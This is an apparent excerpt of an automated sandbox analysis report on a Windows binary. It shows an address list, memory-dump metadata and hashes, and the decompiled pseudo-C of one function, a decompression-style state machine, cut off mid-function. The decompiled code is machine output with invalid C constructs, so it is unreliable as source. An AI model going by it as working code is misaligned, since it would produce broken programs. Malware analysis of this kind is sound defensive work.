                                                  0x00406dac
                                                  0x00406daf
                                                  0x00406dcd
                                                  0x00406dcf
                                                  0x00000000
                                                  0x00406db1
                                                  0x00406db1
                                                  0x00406db4
                                                  0x00406db7
                                                  0x00406dba
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbf
                                                  0x00406dc2
                                                  0x00406dc4
                                                  0x00406dc5
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406ffe
                                                  0x00407002
                                                  0x00407020
                                                  0x00407023
                                                  0x0040702a
                                                  0x0040702d
                                                  0x00407030
                                                  0x00407033
                                                  0x00407036
                                                  0x00407039
                                                  0x0040703b
                                                  0x00407042
                                                  0x00407043
                                                  0x00407045
                                                  0x00407048
                                                  0x0040704b
                                                  0x0040704e
                                                  0x0040704e
                                                  0x00407053
                                                  0x00000000
                                                  0x00407053
                                                  0x00407004
                                                  0x00407007
                                                  0x0040700a
                                                  0x00407014
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00000000
                                                  0x00407068
                                                  0x0040706c
                                                  0x0040708f
                                                  0x00407092
                                                  0x00407095
                                                  0x0040709f
                                                  0x0040706e
                                                  0x0040706e
                                                  0x00407071
                                                  0x00407074
                                                  0x00407077
                                                  0x00407084
                                                  0x00407087
                                                  0x00407087
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00000000
                                                  0x004070ab
                                                  0x004070af
                                                  0x00000000
                                                  0x00000000
                                                  0x004070b5
                                                  0x004070b9
                                                  0x00000000
                                                  0x00000000
                                                  0x004070bf
                                                  0x004070c1
                                                  0x004070c5
                                                  0x004070c5
                                                  0x004070c8
                                                  0x004070cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407143
                                                  0x00407147
                                                  0x0040714e
                                                  0x00407151
                                                  0x00407154
                                                  0x00407149
                                                  0x00407149
                                                  0x00407149
                                                  0x00407157
                                                  0x0040715a
                                                  0x00000000
                                                  0x00000000
                                                  0x00407203
                                                  0x00407203
                                                  0x00407207
                                                  0x004075a5
                                                  0x00000000
                                                  0x004075a5
                                                  0x0040720d
                                                  0x00407210
                                                  0x00407213
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407220
                                                  0x00407222
                                                  0x00407222
                                                  0x00407222
                                                  0x00407225
                                                  0x00407228
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df8
                                                  0x00406df8
                                                  0x00406dfc
                                                  0x00407569
                                                  0x00000000
                                                  0x00407569
                                                  0x00406e02
                                                  0x00406e05
                                                  0x00406e08
                                                  0x00406e0c
                                                  0x00406e0f
                                                  0x00406e15
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e1a
                                                  0x00406e1d
                                                  0x00406e1d
                                                  0x00406e20
                                                  0x00406e23
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e29
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00000000
                                                  0x00407489
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00407447
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9
                                                  0x004074ac
                                                  0x004074af
                                                  0x004074b3
                                                  0x004074b6
                                                  0x004074bc
                                                  0x004074be
                                                  0x004074be
                                                  0x004074be
                                                  0x004074c1
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c7
                                                  0x004074c7
                                                  0x004074cb
                                                  0x0040752b
                                                  0x0040752e
                                                  0x00407533
                                                  0x00407534
                                                  0x00407536
                                                  0x00407538
                                                  0x0040753b
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x0040744d
                                                  0x00407447
                                                  0x004074cd
                                                  0x004074d3
                                                  0x004074d6
                                                  0x004074d9
                                                  0x004074dc
                                                  0x004074df
                                                  0x004074e2
                                                  0x004074e5
                                                  0x004074e8
                                                  0x004074eb
                                                  0x004074ee
                                                  0x00407507
                                                  0x0040750a
                                                  0x0040750d
                                                  0x00407510
                                                  0x00407514
                                                  0x00407516
                                                  0x00407516
                                                  0x00407517
                                                  0x0040751a
                                                  0x004074f0
                                                  0x004074f0
                                                  0x004074f8
                                                  0x004074fd
                                                  0x004074ff
                                                  0x00407502
                                                  0x00407502
                                                  0x0040751d
                                                  0x00407524
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2
                                                  0x004071e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f44
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00000000
                                                  0x00000000
                                                  0x004070cf
                                                  0x004070cf
                                                  0x004070d3
                                                  0x00407599
                                                  0x00000000
                                                  0x00407599
                                                  0x004070d9
                                                  0x004070dc
                                                  0x004070df
                                                  0x004070e2
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e7
                                                  0x004070ea
                                                  0x004070ed
                                                  0x004070f0
                                                  0x004070f3
                                                  0x004070f6
                                                  0x004070f7
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070fc
                                                  0x004070ff
                                                  0x00407102
                                                  0x00407105
                                                  0x00407105
                                                  0x00407105
                                                  0x00407108
                                                  0x0040710a
                                                  0x0040710a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040734c
                                                  0x0040734c
                                                  0x0040734c
                                                  0x00407350
                                                  0x00000000
                                                  0x00000000
                                                  0x00407356
                                                  0x00407359
                                                  0x0040735c
                                                  0x0040735f
                                                  0x00407361
                                                  0x00407361
                                                  0x00407361
                                                  0x00407364
                                                  0x00407367
                                                  0x0040736a
                                                  0x0040736d
                                                  0x00407370
                                                  0x00407373
                                                  0x00407374
                                                  0x00407376
                                                  0x00407376
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737c
                                                  0x0040737f
                                                  0x00407382
                                                  0x00407385
                                                  0x00407389
                                                  0x0040738b
                                                  0x0040738e
                                                  0x00000000
                                                  0x00407390
                                                  0x0040710d
                                                  0x0040710d
                                                  0x00000000
                                                  0x0040710d
                                                  0x0040738e
                                                  0x004075c3
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2
                                                  0x004075fa
                                                  0x004075fa
                                                  0x00000000
                                                  0x004075fa
                                                  0x00407447
                                                  0x004073ce
                                                  0x004073cb
                                                  0x00000000
                                                  0x00407120

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                  • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                  • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                  • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
